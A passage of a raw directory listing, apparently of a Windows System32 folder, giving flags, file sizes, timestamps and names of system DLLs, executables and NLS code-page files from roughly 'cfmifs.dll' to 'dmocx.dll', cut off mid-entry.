cfmifs.dll +F 14848 09/15/2018 07:29:13 cfmifsproxy.dll +F 7870976 03/07/2020 00:54:13 Chakra.dll +F 155136 03/07/2020 00:54:13 Chakradiag.dll +F 139776 09/15/2018 07:29:18 Chakrathunk.dll +F 17408 09/15/2018 09:10:03 change.exe +F 102216 09/15/2018 07:28:44 changepk.exe +F 190976 09/15/2018 07:29:22 charmap.exe +F 129024 09/15/2018 07:28:44 chartv.dll +F 779776 09/15/2018 07:28:34 ChatApis.dll +F 14336 09/15/2018 07:29:16 chcp.com +F 28672 09/15/2018 07:29:19 CheckNetIsolation.exe +F 22016 09/15/2018 09:10:03 chglogon.exe +F 25088 09/15/2018 09:10:03 chgport.exe +F 22016 09/15/2018 09:10:03 chgusr.exe +F 25088 09/15/2018 07:28:43 chkdsk.exe +F 21504 09/15/2018 07:28:43 chkntfs.exe +F 26112 09/15/2018 07:28:56 chkwudrv.dll +F 33792 09/15/2018 07:29:16 choice.exe +F 455680 03/07/2020 00:53:31 ChsStrokeDS.dll +F 167640 09/15/2018 07:28:36 chs_singlechar_pinyin.dat +F 103424 09/15/2018 07:28:22 ChtAdvancedDS.dll +F 458240 03/07/2020 00:53:31 ChtBopomofoDS.dll +F 463872 03/07/2020 00:53:31 ChtCangjieDS.dll +F 456192 03/07/2020 00:53:31 ChtHkStrokeDS.dll +F 454144 03/07/2020 00:53:31 ChtQuickDS.dll +F 535552 03/07/2020 00:53:31 ChxAPDS.dll +F 376320 03/07/2020 00:53:31 ChxDecoder.dll +F 509440 03/07/2020 00:53:31 ChxHAPDS.dll +F 358912 03/07/2020 00:53:31 chxinputrouter.dll +F 120832 03/07/2020 00:53:31 chxranker.dll +F 13312 09/15/2018 07:28:44 CHxReadingStringIME.dll +F 856432 03/07/2020 00:53:26 ci.dll +F 200192 09/15/2018 07:29:20 cic.dll +F 30720 09/15/2018 07:29:13 CIDiag.exe +F 47104 09/15/2018 07:28:52 cipher.exe +F 11264 09/15/2018 07:28:15 CIRCoInst.dll +F 41472 09/15/2018 09:09:58 CIWmi.dll +F 18432 09/15/2018 07:29:21 clb.dll +F 644568 09/15/2018 07:28:43 clbcatq.dll +F 103936 09/15/2018 07:28:43 cldapi.dll +F 221184 09/15/2018 07:29:14 cleanmgr.exe +F 59392 09/15/2018 07:29:22 CleanPCCSP.dll +F 73728 03/07/2020 00:53:29 clfsw32.dll +F 87040 09/15/2018 07:29:20 cliconfg.dll +F 30720 09/15/2018 07:29:20 cliconfg.exe +F 37376 09/15/2018 07:29:20 cliconfg.rll +F 30720 09/15/2018 07:29:14 clip.exe +F 198656 09/15/2018 07:28:30 ClipboardServer.dll +F 155968 09/15/2018 07:28:29 Clipc.dll +F 871792 03/07/2020 00:53:24 ClipSVC.dll +F 1247856 03/07/2020 00:54:11 ClipUp.exe +F 485376 03/07/2020 00:53:37 cloudAP.dll +F 115712 03/07/2020 00:53:43 CloudDomainJoinAUG.dll +F 348672 09/15/2018 07:28:36 CloudDomainJoinDataModelServer.dll +F 409912 03/07/2020 00:53:51 CloudExperienceHost.dll +F 274448 03/07/2020 00:53:51 CloudExperienceHostBroker.dll +F 65848 09/15/2018 07:28:40 CloudExperienceHostBroker.exe +F 938296 03/07/2020 00:53:38 CloudExperienceHostCommon.dll +F 258872 09/15/2018 07:28:30 CloudExperienceHostUser.dll +F 79032 03/07/2020 00:53:33 CloudNotifications.exe +F 193704 03/07/2020 00:53:33 CloudStorageWizard.exe +F 16384 09/15/2018 07:29:33 clrhost.dll +F 1051136 03/07/2020 00:54:08 clusapi.dll +F 37888 09/15/2018 07:28:57 cmcfg32.dll +F 278528 03/07/2020 00:53:43 cmd.exe +F 27136 09/15/2018 07:28:44 cmdext.dll +F 556032 09/15/2018 07:28:57 cmdial32.dll +F 19968 09/15/2018 07:28:58 cmdkey.exe +F 51712 09/15/2018 07:28:57 cmdl32.exe +F 71680 09/15/2018 07:28:50 cmgrcspps.dll +F 102200 09/15/2018 07:28:25 cmifw.dll +F 44544 03/07/2020 00:53:41 cmintegrator.dll +F 45568 09/15/2018 07:28:57 cmlua.dll +F 43008 09/15/2018 07:28:57 cmmon32.exe +F 29696 09/15/2018 07:28:57 cmpbk32.dll +F 93696 09/15/2018 07:28:57 cmstp.exe +F 20480 09/15/2018 07:28:57 cmstplua.dll +F 59392 09/15/2018 07:28:57 cmutil.dll +F 110592 09/15/2018 07:28:58 cngcredui.dll +F 65536 09/15/2018 07:29:14 cngprovider.dll +F 39424 09/15/2018 07:29:14 cnvfat.dll +F 30720 09/15/2018 07:28:22 cob-au.rs +D 0 09/15/2018 07:33:50 CodeIntegrity +F 24064 09/15/2018 07:29:23 cofire.exe +F 33280 09/15/2018 07:29:23 cofiredm.dll +F 80896 09/15/2018 07:28:43 colbact.dll +F 49152 09/15/2018 07:28:34 coloradapterclient.dll +F 203224 09/15/2018 09:10:01 COLORCNV.DLL +F 87552 09/15/2018 07:28:52 colorcpl.exe +F 622080 09/15/2018 07:28:52 colorui.dll +D 0 09/15/2018 09:07:52 com +F 3334496 03/07/2020 00:53:26 combase.dll +F 10240 09/15/2018 07:28:42 comcat.dll +F 674304 09/15/2018 07:28:57 comctl32.dll +F 1169920 03/07/2020 00:53:46 comdlg32.dll +F 124118 09/15/2018 07:28:42 comexp.msc +F 468792 03/07/2020 00:53:40 coml2.dll +F 25088 09/15/2018 07:29:13 comp.exe +F 46080 03/07/2020 00:53:52 compact.exe +F 164368 03/07/2020 00:53:51 CompatTelRunner.exe +F 113256 09/15/2018 07:29:16 compmgmt.msc +F 91136 03/07/2020 00:54:11 CompMgmtLauncher.exe +F 315904 03/07/2020 00:53:53 ComposableShellProxyStub.dll +F 264704 03/07/2020 00:53:53 ComposerFramework.dll +F 165376 03/07/2020 00:53:31 CompPkgSrv.exe +F 114648 03/07/2020 00:53:31 CompPkgSup.dll +F 310272 09/15/2018 07:28:57 compstui.dll +F 662024 03/07/2020 00:53:22 computecore.dll +F 15888 09/15/2018 07:29:16 computelibeventlog.dll +F 74752 09/15/2018 07:29:16 computenetwork.dll +F 78336 03/07/2020 00:54:11 ComputerDefaults.exe +F 686 09/15/2018 07:28:22 ComputerToastIcon.contrast-white.png +F 387 09/15/2018 07:28:22 ComputerToastIcon.png +F 310072 03/07/2020 00:53:22 computestorage.dll +F 133632 09/15/2018 07:28:42 comrepl.dll +F 1295360 09/15/2018 07:28:42 comres.dll +F 289280 09/15/2018 07:28:42 comsnap.dll +F 1684480 09/15/2018 07:28:44 comsvcs.dll +F 805888 09/15/2018 07:28:43 comuid.dll +F 332456 02/16/2017 16:45:12 concrt140.dll +D 0 03/29/2020 10:20:55 config +F 673280 03/07/2020 00:53:58 configmanager2.dll +D 0 03/30/2020 08:45:35 Configuration +F 63488 09/15/2018 07:28:57 ConfigureExpandedStorage.dll +F 822272 03/07/2020 00:53:26 conhost.exe +F 315904 03/07/2020 00:53:51 ConhostV1.dll +F 1357312 09/15/2018 07:28:56 connect.dll +F 61952 09/15/2018 07:28:50 ConnectedAccountState.dll +F 159272 03/07/2020 00:53:43 consent.exe +F 132096 09/15/2018 07:29:14 ConsentExperienceCommon.dll +F 105784 03/07/2020 00:53:58 ConsentUX.dll +F 157696 09/15/2018 07:29:14 ConsentUxClient.dll +F 127488 09/15/2018 07:28:44 console.dll +F 344576 03/07/2020 00:53:57 ConsoleLogon.dll +F 1753088 03/07/2020 00:53:50 ConstraintIndex.Search.dll +F 56320 09/15/2018 07:28:36 ContactActivation.dll +F 1005056 09/15/2018 07:28:34 ContactApis.dll +F 215552 03/07/2020 00:54:15 ContactHarvesterDS.dll +F 217600 03/07/2020 00:53:26 container.dll +F 1701384 03/07/2020 00:53:31 ContentDeliveryManager.Utilities.dll +F 117760 09/15/2018 07:28:24 control.exe +F 21504 09/15/2018 07:29:14 convert.exe +F 225592 09/15/2018 07:28:39 convertvhd.exe +F 14848 09/15/2018 07:28:20 coreaudiopolicymanagerext.dll +F 281600 03/07/2020 00:53:58 coredpus.dll +F 73728 03/07/2020 00:53:58 coredpussvr.exe +F 918304 03/07/2020 00:53:21 CoreMessaging.dll +F 19968 09/15/2018 09:10:01 CoreMmRes.dll +F 1729024 03/07/2020 00:53:53 CoreShell.dll +F 451584 03/07/2020 00:53:53 CoreShellAPI.dll +F 101888 03/07/2020 00:53:53 CoreShellExtFramework.dll +F 3292352 09/15/2018 07:28:32 CoreUIComponents.dll +F 86528 09/15/2018 07:29:23 correngine.dll +F 281600 03/07/2020 00:53:45 Cortana.Persona.dll +F 246784 09/15/2018 07:28:57 CortanaMapiHelper.dll +F 17408 09/15/2018 07:28:57 CortanaMapiHelper.ProxyStub.dll +F 201728 09/15/2018 07:28:24 CourtesyEngine.dll +F 883200 03/07/2020 00:54:17 CPFilters.dll +F 129536 03/07/2020 00:53:51 CredDialogBroker.dll +F 54784 03/07/2020 00:53:33 CredentialMigrationHandler.dll +F 139648 03/07/2020 00:53:57 CredentialUIBroker.exe +F 109056 09/15/2018 07:28:51 CredProv2faHelper.dll +F 611840 03/07/2020 00:53:23 CredProvDataModel.dll +F 88064 03/07/2020 00:53:57 CredProvHelper.dll +F 340480 03/07/2020 00:53:57 credprovhost.dll +F 334336 03/07/2020 00:53:57 credprovs.dll +F 193024 09/15/2018 07:28:50 credprovslegacy.dll +F 23552 09/15/2018 07:28:59 credssp.dll +F 49152 03/07/2020 00:53:57 credui.dll +F 37888 09/15/2018 07:29:22 credwiz.exe +F 1936520 03/07/2020 00:53:26 crypt32.dll +F 33832 09/15/2018 07:28:45 cryptbase.dll +F 124416 03/07/2020 00:53:57 cryptcatsvc.dll +F 31232 09/15/2018 07:29:19 cryptdlg.dll +F 66688 03/07/2020 00:53:26 cryptdll.dll +F 71680 09/15/2018 07:28:50 cryptext.dll +F 169984 09/15/2018 07:28:45 cryptnet.dll +F 435712 03/07/2020 00:53:42 cryptngc.dll +F 375296 09/15/2018 07:28:30 CryptoWinRT.dll +F 80112 09/15/2018 07:28:46 cryptsp.dll +F 95232 09/15/2018 07:28:46 cryptsvc.dll +F 62976 09/15/2018 07:28:30 crypttpmeksvc.dll +F 596992 03/07/2020 00:53:57 cryptui.dll +F 383488 09/15/2018 07:29:21 cryptuiwizard.dll +F 126568 09/15/2018 07:28:34 cryptxml.dll +D 0 09/15/2018 09:09:27 cs-CZ +F 49664 03/07/2020 00:53:45 cscapi.dll +F 30208 03/07/2020 00:53:45 cscdll.dll +F 145424 09/15/2018 09:09:56 CscMig.dll +F 295424 03/07/2020 00:54:24 cscobj.dll +F 162816 09/15/2018 07:28:57 cscript.exe +F 740352 03/07/2020 00:54:24 cscsvc.dll +F 808960 03/07/2020 00:54:24 cscui.dll +F 57856 09/15/2018 07:29:16 CspCellularSettings.dll +F 165888 09/15/2018 07:29:16 csplte.dll +F 61952 09/15/2018 07:28:24 CspProxy.dll +F 43520 09/15/2018 07:28:22 csrr.rs +F 62976 09/15/2018 07:28:46 csrsrv.dll +F 17792 09/15/2018 07:28:45 csrss.exe +F 24064 09/15/2018 07:28:29 CSystemEventsBrokerClient.dll +F 10752 09/15/2018 07:28:45 ctfmon.exe +F 326144 09/15/2018 07:29:14 cttune.exe +F 41984 09/15/2018 07:29:14 cttunesvr.exe +F 421376 03/07/2020 00:53:29 curl.exe +F 108544 09/15/2018 07:28:42 cxcredprov.dll +F 291328 03/07/2020 00:54:18 CXHProvisioningServer.dll +F 66082 09/15/2018 07:29:18 C_037.NLS +F 66082 09/15/2018 07:29:18 C_10000.NLS +F 162850 09/15/2018 07:29:18 C_10001.NLS +F 195618 09/15/2018 07:29:18 C_10002.NLS +F 177698 09/15/2018 07:29:18 C_10003.NLS +F 66082 09/15/2018 07:29:18 C_10004.NLS +F 66082 09/15/2018 07:29:18 C_10005.NLS +F 66082 09/15/2018 07:29:18 C_10006.NLS +F 66082 09/15/2018 07:29:18 C_10007.NLS +F 173602 09/15/2018 07:29:18 C_10008.NLS +F 66082 09/15/2018 07:29:18 C_10010.NLS +F 66082 09/15/2018 07:29:18 C_10017.NLS +F 66082 09/15/2018 07:29:18 C_10021.NLS +F 66082 09/15/2018 07:29:18 C_10029.NLS +F 66082 09/15/2018 07:29:18 C_10079.NLS +F 66082 09/15/2018 07:29:18 C_10081.NLS +F 66082 09/15/2018 07:29:18 C_10082.NLS +F 66082 09/15/2018 07:29:18 C_1026.NLS +F 66082 09/15/2018 07:29:18 C_1047.NLS +F 66082 09/15/2018 07:29:18 C_1140.NLS +F 66082 09/15/2018 07:29:18 C_1141.NLS +F 66082 09/15/2018 07:29:18 C_1142.NLS +F 66082 09/15/2018 07:29:18 C_1143.NLS +F 66082 09/15/2018 07:29:18 C_1144.NLS +F 66082 09/15/2018 07:29:18 C_1145.NLS +F 66082 09/15/2018 07:29:18 C_1146.NLS +F 66082 09/15/2018 07:29:18 C_1147.NLS +F 66082 09/15/2018 07:29:18 C_1148.NLS +F 66082 09/15/2018 07:29:18 C_1149.NLS +F 66082 09/15/2018 07:28:46 C_1250.NLS +F 66082 09/15/2018 07:28:46 C_1251.NLS +F 66082 09/15/2018 07:28:46 C_1252.NLS +F 66082 09/15/2018 07:28:46 C_1253.NLS +F 66082 09/15/2018 07:28:46 C_1254.NLS +F 66082 09/15/2018 07:28:46 C_1255.NLS +F 66082 09/15/2018 07:28:46 C_1256.NLS +F 66082 09/15/2018 07:28:46 C_1257.NLS +F 66082 09/15/2018 07:28:46 C_1258.NLS +F 189986 09/15/2018 07:28:46 C_1361.NLS +F 180258 09/15/2018 07:28:46 C_20000.NLS +F 186402 09/15/2018 07:28:46 C_20001.NLS +F 173602 09/15/2018 07:28:46 C_20002.NLS +F 185378 09/15/2018 07:28:46 C_20003.NLS +F 180258 09/15/2018 07:28:46 C_20004.NLS +F 187938 09/15/2018 07:28:46 C_20005.NLS +F 66082 09/15/2018 07:29:18 C_20105.NLS +F 66082 09/15/2018 07:29:18 C_20106.NLS +F 66082 09/15/2018 07:29:18 C_20107.NLS +F 66082 09/15/2018 07:29:18 C_20108.NLS +F 66082 09/15/2018 07:28:46 C_20127.NLS +F 139810 09/15/2018 07:28:46 C_20261.NLS +F 66082 09/15/2018 07:29:18 C_20269.NLS +F 66082 09/15/2018 07:29:18 C_20273.NLS +F 66082 09/15/2018 07:29:18 C_20277.NLS +F 66082 09/15/2018 07:29:18 C_20278.NLS +F 66082 09/15/2018 07:29:18 C_20280.NLS +F 66082 09/15/2018 07:29:18 C_20284.NLS +F 66082 09/15/2018 07:29:18 C_20285.NLS +F 66082 09/15/2018 07:29:18 C_20290.NLS +F 66082 09/15/2018 07:29:18 C_20297.NLS +F 66082 09/15/2018 07:29:18 C_20420.NLS +F 66082 09/15/2018 07:29:18 C_20423.NLS +F 66082 09/15/2018 07:29:18 C_20424.NLS +F 66082 09/15/2018 07:29:18 C_20833.NLS +F 66082 09/15/2018 07:29:18 C_20838.NLS +F 66082 09/15/2018 07:28:46 C_20866.NLS +F 66082 09/15/2018 07:29:18 C_20871.NLS +F 66082 09/15/2018 07:29:18 C_20880.NLS +F 66082 09/15/2018 07:29:18 C_20905.NLS +F 66082 09/15/2018 07:29:18 C_20924.NLS +F 180770 09/15/2018 07:28:46 C_20932.NLS +F 173602 09/15/2018 07:28:46 C_20936.NLS +F 177698 09/15/2018 07:28:46 C_20949.NLS +F 66082 09/15/2018 07:29:18 C_21025.NLS +F 66082 09/15/2018 07:29:18 C_21027.NLS +F 66082 09/15/2018 07:28:46 C_21866.NLS +F 66082 09/15/2018 07:28:46 C_28591.NLS +F 66082 09/15/2018 07:28:46 C_28592.NLS +F 66082 09/15/2018 07:28:46 C_28593.NLS +F 66082 09/15/2018 07:28:46 C_28594.NLS +F 66082 09/15/2018 07:28:46 C_28595.NLS +F 66082 09/15/2018 07:28:46 C_28596.NLS +F 66082 09/15/2018 07:28:46 C_28597.NLS +F 66082 09/15/2018 07:28:46 C_28598.NLS +F 66082 09/15/2018 07:28:46 C_28599.NLS +F 66082 09/15/2018 07:28:46 c_28603.nls +F 66082 09/15/2018 07:28:46 C_28605.NLS +F 66594 09/15/2018 07:28:46 C_437.NLS +F 66082 09/15/2018 07:29:18 C_500.NLS +F 66082 09/15/2018 07:28:46 C_708.NLS +F 66594 09/15/2018 07:28:46 C_720.NLS +F 66594 09/15/2018 07:28:46 C_737.NLS +F 66594 09/15/2018 07:28:46 C_775.NLS +F 66594 09/15/2018 07:28:46 C_850.NLS +F 66594 09/15/2018 07:28:46 C_852.NLS +F 66594 09/15/2018 07:28:46 C_855.NLS +F 66594 09/15/2018 07:28:46 C_857.NLS +F 66594 09/15/2018 07:28:46 C_858.NLS +F 66594 09/15/2018 07:28:46 C_860.NLS +F 66594 09/15/2018 07:28:46 C_861.NLS +F 66594 09/15/2018 07:28:46 C_862.NLS +F 66594 09/15/2018 07:28:46 C_863.NLS +F 66594 09/15/2018 07:28:46 C_864.NLS +F 66594 09/15/2018 07:28:46 C_865.NLS +F 66594 09/15/2018 07:28:46 C_866.NLS +F 66594 09/15/2018 07:28:46 C_869.NLS +F 66082 09/15/2018 07:29:18 C_870.NLS +F 66594 09/15/2018 07:28:46 C_874.NLS +F 66082 09/15/2018 07:29:18 C_875.NLS +F 162850 09/15/2018 07:28:46 C_932.NLS +F 196642 09/15/2018 07:28:46 C_936.NLS +F 196642 09/15/2018 07:28:46 C_949.NLS +F 196642 09/15/2018 07:28:46 C_950.NLS +F 227840 09/15/2018 07:28:46 C_G18030.DLL +F 14848 09/15/2018 07:28:46 c_GSM7.DLL +F 17408 09/15/2018 07:28:46 C_IS2022.DLL +F 14336 09/15/2018 07:29:18 C_ISCII.DLL +F 6058032 03/07/2020 00:53:39 d2d1.dll +F 1219584 09/15/2018 07:28:50 d3d10.dll +F 36352 09/15/2018 07:28:50 d3d10core.dll +F 386456 09/15/2018 07:28:34 d3d10level9.dll +F 7556600 03/07/2020 00:53:39 d3d10warp.dll +F 179712 09/15/2018 07:28:50 d3d10_1.dll +F 37376 09/15/2018 07:28:50 d3d10_1core.dll +F 2611136 03/07/2020 00:53:39 d3d11.dll +F 622336 03/07/2020 00:53:39 d3d11on12.dll +F 1844456 03/07/2020 00:53:39 D3D12.dll +F 13824 09/15/2018 07:28:51 d3d8thk.dll +F 1678800 03/07/2020 00:53:57 d3d9.dll +F 826880 03/07/2020 00:53:39 d3d9on12.dll +F 4477440 09/15/2018 07:28:32 D3DCompiler_47.dll +F 148992 03/07/2020 00:53:39 D3DSCache.dll +D 0 09/15/2018 09:09:27 da-DK +F 109568 03/07/2020 00:53:53 dab.dll +F 14336 09/15/2018 07:28:46 dabapi.dll +F 55296 09/15/2018 07:28:50 DAConn.dll +F 136704 09/15/2018 07:28:26 dafAspInfraProvider.dll +F 274432 09/15/2018 07:28:38 dafBth.dll +F 47104 09/15/2018 07:28:34 DafDnsSd.dll +F 129024 09/15/2018 07:28:50 dafDockingProvider.dll +F 70656 09/15/2018 07:28:22 DafGip.dll +F 193024 09/15/2018 07:28:30 DAFIoT.dll +F 301568 03/07/2020 00:54:16 DAFIPP.dll +F 295424 09/15/2018 07:28:36 dafpos.dll +F 119808 09/15/2018 07:28:57 DafPrintProvider.dll +F 184832 09/15/2018 07:29:13 dafupnp.dll +F 114688 09/15/2018 07:28:24 dafWCN.dll +F 362496 03/07/2020 00:53:33 dafWfdProvider.dll +F 119808 09/15/2018 07:29:13 DAFWiProv.dll +F 313344 03/07/2020 00:53:42 DAFWSD.dll +F 132096 09/15/2018 07:28:38 DAMediaManager.dll +F 124928 09/15/2018 07:28:50 DAMM.dll +F 322560 09/15/2018 07:28:56 DaOtpCredentialProvider.dll +F 475136 09/15/2018 07:28:36 das.dll +F 95744 09/15/2018 07:28:36 dasHost.exe +F 46592 03/07/2020 00:54:11 dataclen.dll +F 335872 03/07/2020 00:53:39 DataExchange.dll +F 243216 03/07/2020 00:54:11 DataExchangeHost.exe +F 114176 09/15/2018 07:29:13 datamarketsvc.dll +F 148480 03/07/2020 00:53:35 DataStoreCacheDumpTool.exe +F 361984 03/07/2020 00:54:08 DataUsageHandlers.dll +F 134144 03/07/2020 00:54:08 DataUsageLiveTileTask.exe +F 34304 09/15/2018 07:28:56 datusage.dll +F 95232 09/15/2018 07:29:25 davclnt.dll +F 27648 09/15/2018 07:28:57 davhlpr.dll +F 415744 03/07/2020 00:54:28 DavSyncProvider.dll +F 616448 03/07/2020 00:53:43 daxexec.dll +F 155648 09/15/2018 07:28:46 dbgcore.dll +F 6132736 03/07/2020 00:53:29 dbgeng.dll +F 1903616 09/15/2018 07:28:46 dbghelp.dll +F 671744 09/15/2018 07:28:45 DbgModel.dll +F 117248 09/15/2018 07:29:20 dbnetlib.dll +F 24064 09/15/2018 07:29:20 dbnmpntw.dll +F 659456 09/15/2018 07:28:51 dccw.exe +F 14336 09/15/2018 07:28:47 dciman32.dll +F 514600 03/07/2020 00:53:26 dcntel.dll +F 11776 09/15/2018 07:28:42 dcomcnfg.exe +F 1837136 03/07/2020 00:53:53 dcomp.dll +F 29712 09/15/2018 07:29:16 DDACLSys.dll +F 54272 09/15/2018 07:28:22 DdcAntiTheftApi.dll +F 25600 09/15/2018 07:28:22 DdcClaimsApi.dll +F 54272 09/15/2018 07:28:24 DdcComImplementationsDesktop.dll +F 495616 03/07/2020 00:53:28 DDDS.dll +D 0 09/15/2018 07:34:00 DDFs +F 211456 03/07/2020 00:53:39 ddisplay.dll +F 38400 09/15/2018 07:28:51 ddodiag.exe +F 31744 09/15/2018 07:28:50 DDOIProxy.dll +F 15650664 09/15/2018 07:28:50 DDORes.dll +F 228352 03/07/2020 00:54:22 ddpchunk.dll +F 136704 09/15/2018 09:10:02 ddptrace.dll +F 285696 09/15/2018 09:10:02 ddputils.dll +F 66560 09/15/2018 09:10:02 ddp_ps.dll +F 583680 09/15/2018 07:28:50 ddraw.dll +F 48128 09/15/2018 07:28:50 ddrawex.dll +D 0 03/07/2020 00:55:54 de-DE +F 366 09/15/2018 07:28:30 DefaultAccountTile.png +F 21376 09/15/2018 07:28:50 DefaultDeviceManager.dll +F 4227116 09/15/2018 07:28:22 DefaultHrtfs.bin +F 26624 09/15/2018 07:28:50 DefaultPrinterProvider.dll +F 858 09/15/2018 07:31:36 DefaultQuestions.json +F 186880 03/07/2020 00:54:09 Defrag.exe +F 19968 09/15/2018 07:29:14 defragproxy.dll +F 4096 09/15/2018 07:29:14 defragres.dll +F 492032 03/07/2020 00:54:09 defragsvc.dll +F 26624 09/15/2018 07:29:14 delegatorprovider.dll +F 168960 09/15/2018 07:29:23 desk.cpl +F 50688 09/15/2018 07:29:16 deskadp.dll +F 49152 09/15/2018 07:29:24 deskmon.dll +F 77312 03/07/2020 00:53:48 desktopimgdownldr.exe +F 278879 09/15/2018 07:28:39 DesktopKeepOnToastImg.gif +F 45568 09/15/2018 07:28:39 DesktopShellAppStateContract.dll +F 105472 03/07/2020 00:53:43 DesktopShellExt.dll +F 262656 03/07/2020 00:53:48 DesktopSwitcherDataModel.dll +F 3944 09/15/2018 07:28:44 DetailedReading-Default.xml +F 119328 09/15/2018 07:28:30 DevDispItemProvider.dll +F 305664 09/15/2018 07:28:56 DeveloperOptionsSettingsHandlers.dll +F 91392 09/15/2018 07:29:22 devenum.dll +F 217904 03/07/2020 00:53:39 deviceaccess.dll +F 58368 09/15/2018 07:28:36 deviceassociation.dll +F 36368 03/07/2020 00:53:26 DeviceCensus.exe +F 441344 03/07/2020 00:54:11 DeviceCenter.dll +F 67072 09/15/2018 07:28:34 DeviceCredential.dll +F 80896 09/15/2018 07:28:38 DeviceCredentialDeployment.exe +F 305664 03/07/2020 00:53:32 DeviceDirectoryClient.dll +F 34816 09/15/2018 07:28:50 DeviceDisplayStatusManager.dll +F 46080 09/15/2018 07:28:51 DeviceDriverRetrievalClient.dll +F 30208 09/15/2018 07:28:56 DeviceEject.exe +F 128000 09/15/2018 07:29:14 DeviceElementSource.dll +F 360960 03/07/2020 00:53:58 DeviceEnroller.exe +F 1961984 03/07/2020 00:53:50 DeviceFlows.DataModel.dll +F 138752 03/07/2020 00:53:57 DeviceMetadataRetrievalClient.dll +F 209920 09/15/2018 07:28:50 devicengccredprov.dll +F 571904 09/15/2018 07:29:14 DevicePairing.dll +F 105984 09/15/2018 07:28:41 DevicePairingExperienceMEM.dll +F 215040 09/15/2018 07:29:14 DevicePairingFolder.dll +F 29184 09/15/2018 07:29:14 DevicePairingProxy.dll +F 94208 09/15/2018 07:29:14 DevicePairingWizard.exe +F 94720 09/15/2018 07:29:14 DeviceProperties.exe +F 88576 09/15/2018 07:28:45 DeviceReactivation.dll +F 228352 09/15/2018 07:28:23 deviceregistration.dll +F 241664 03/07/2020 00:53:37 DeviceSetupManager.dll +F 157696 09/15/2018 07:28:50 DeviceSetupManagerAPI.dll +F 35328 09/15/2018 07:28:50 DeviceSetupStatusProvider.dll +F 745472 03/07/2020 00:53:50 DevicesFlowBroker.dll +F 152576 03/07/2020 00:53:57 DeviceSoftwareInstallationClient.dll +F 106496 09/15/2018 07:28:55 DeviceUpdateAgent.dll +F 13312 09/15/2018 07:29:14 DeviceUxRes.dll +F 638480 03/07/2020 00:53:51 devinv.dll +F 145622 09/15/2018 07:28:56 devmgmt.msc +F 827392 09/15/2018 07:28:56 devmgr.dll +F 13091 09/15/2018 07:28:56 DevModeRunAsUserConfig.msc +F 156512 03/07/2020 00:53:28 devobj.dll +F 123904 09/15/2018 07:28:30 DevPropMgr.dll +F 34816 03/07/2020 00:53:35 DevQueryBroker.dll +F 59392 09/15/2018 07:28:46 devrtl.dll +F 45568 09/15/2018 07:29:14 dfdts.dll +F 52736 09/15/2018 07:29:14 DFDWiz.exe +F 576512 03/07/2020 00:54:11 dfrgui.exe +F 64512 09/15/2018 07:28:46 dfscli.dll +F 1571328 09/15/2018 07:29:33 dfshim.dll +F 66560 09/15/2018 07:28:55 DfsShlEx.dll +F 81920 09/15/2018 09:09:59 dggpext.dll +F 14848 09/15/2018 07:29:16 dhcpcmonitor.dll +F 368640 03/07/2020 00:53:26 dhcpcore.dll +F 281600 03/07/2020 00:53:26 dhcpcore6.dll +F 91648 09/15/2018 07:28:46 dhcpcsvc.dll +F 68096 09/15/2018 07:28:46 dhcpcsvc6.dll +F 217088 09/15/2018 07:29:14 dhcpsapi.dll +F 1053696 09/15/2018 07:29:22 DiagCpl.dll +F 99840 09/15/2018 07:28:30 DiagnosticInvoker.dll +F 326144 03/07/2020 00:53:58 DiagnosticLogCSP.dll +F 1329664 09/15/2018 07:29:14 diagperf.dll +F 212480 03/07/2020 00:54:17 DiagSvc.dll +D 0 03/07/2020 00:55:54 DiagSvcs +F 3581440 03/07/2020 00:53:29 diagtrack.dll +F 240128 09/15/2018 07:29:16 dialclient.dll +F 37376 09/15/2018 07:29:22 dialer.exe +F 180224 09/15/2018 07:29:16 dialserver.dll +F 492032 03/07/2020 00:53:49 DictationManager.dll +F 348160 09/15/2018 07:28:56 difxapi.dll +F 43520 09/15/2018 07:29:14 dimsjob.dll +F 47104 09/15/2018 07:29:14 dimsroam.dll +F 168448 09/15/2018 07:29:14 dinput.dll +F 220160 09/15/2018 07:29:14 dinput8.dll +F 25088 09/15/2018 07:28:38 Direct2DDesktop.dll +F 605576 03/07/2020 00:53:37 directmanipulation.dll +F 1720320 03/07/2020 00:53:37 directml.dll +F 289792 03/07/2020 00:54:08 discan.dll +F 47682 09/15/2018 07:28:45 diskmgmt.msc +F 155648 09/15/2018 07:28:45 diskpart.exe +F 25088 09/15/2018 07:29:20 diskperf.exe +F 337920 09/15/2018 07:28:45 diskraid.exe +F 83978 09/15/2018 07:28:38 DiskSnapshot.conf +F 92160 03/07/2020 00:53:28 DiskSnapshot.exe +D 0 03/07/2020 00:55:54 Dism +F 290616 03/07/2020 00:53:57 Dism.exe +F 1006392 03/07/2020 00:53:57 DismApi.dll +F 372224 09/15/2018 07:28:34 DispBroker.dll +F 124928 09/15/2018 07:28:32 dispdiag.exe +F 29184 09/15/2018 07:28:57 dispex.dll +F 154112 09/15/2018 07:29:14 Display.dll +F 171520 03/07/2020 00:53:39 DisplayManager.dll +F 1924976 03/07/2020 00:54:11 DisplaySwitch.exe +F 602 09/15/2018 07:28:22 DisplaySystemToastIcon.contrast-white.png +F 346 09/15/2018 07:28:22 DisplaySystemToastIcon.png +F 15360 09/15/2018 07:28:22 djctq.rs +F 73728 09/15/2018 07:28:56 djoin.exe +F 21304 09/15/2018 07:28:45 dllhost.exe +F 12800 09/15/2018 07:28:42 dllhst3g.exe +F 291840 09/15/2018 09:10:00 dlnashext.dll +F 10752 09/15/2018 07:28:51 DMAlertListener.ProxyStub.dll +F 61952 09/15/2018 07:28:24 DmApiSetExtImplDesktop.dll +F 2560 09/15/2018 07:28:50 DMAppsRes.dll +F 167936 09/15/2018 07:28:50 dmcertinst.exe +F 38400 09/15/2018 07:28:51 dmcfghost.exe +F 108544 09/15/2018 07:28:51 dmcfgutils.dll +F 120320 09/15/2018 07:28:25 dmclient.exe +F 157536 03/07/2020 00:53:57 dmcmnutils.dll +F 14848 09/15/2018 07:28:52 dmcommandlineutils.dll +F 167424 03/07/2020 00:53:58 dmcsps.dll +F 458240 09/15/2018 07:28:45 dmdlgs.dll +F 267264 09/15/2018 07:28:44 dmdskmgr.dll +F 1064960 09/15/2018 07:28:45 dmdskres.dll +F 2560 09/15/2018 07:28:45 dmdskres2.dll +F 553472 03/07/2020 00:53:58 dmenrollengine.dll +F 303104 03/07/2020 00:53:58 dmenterprisediagnostics.dll +F 56320 09/15/2018 07:28:45 dmintf.dll +F 14848 09/15/2018 07:28:50 dmiso8601utils.dll +F 49664 09/15/2018 07:29:16 dmloader.dll +F 32256 09/15/2018 07:28:22 DmNotificationBroker.exe +F 52736 09/15/2018 07:28:56 dmocx.dll +F 